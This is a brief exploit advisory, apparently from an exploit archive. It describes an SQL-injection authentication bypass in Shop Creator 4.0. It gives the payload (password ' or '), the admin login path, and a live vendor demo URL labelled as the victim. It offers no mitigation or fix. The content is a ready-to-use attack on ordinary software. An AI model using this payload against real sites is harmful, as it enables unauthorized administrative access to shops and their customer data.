id: 13890
date: 08/27/2010
title: Shop Creator 4.0 Bypass Vulnerability
author: Cyber-sec
cves: 

=====================================
Shop Creator 4.0 Bypass Vulnerability
=====================================

#########################################################
---------------------------------------------------------
Portal Name: Shop Creator
Version: 4.0
Vendor: http://www.etoshop.com
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Website: http://Pouya-Server.ir
Vulnerability : (Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------
#########################################################
[Auth Bypass]:
user: pouya
pass: ' or '
admin page : http://site.com/[path]/admin.asp
---------------------------------
Victem :
http://www.etoshop.com/demo/pcstore
---------------------------------------------------------
#########################################################
                



#  0day.today [2023-03-27]  #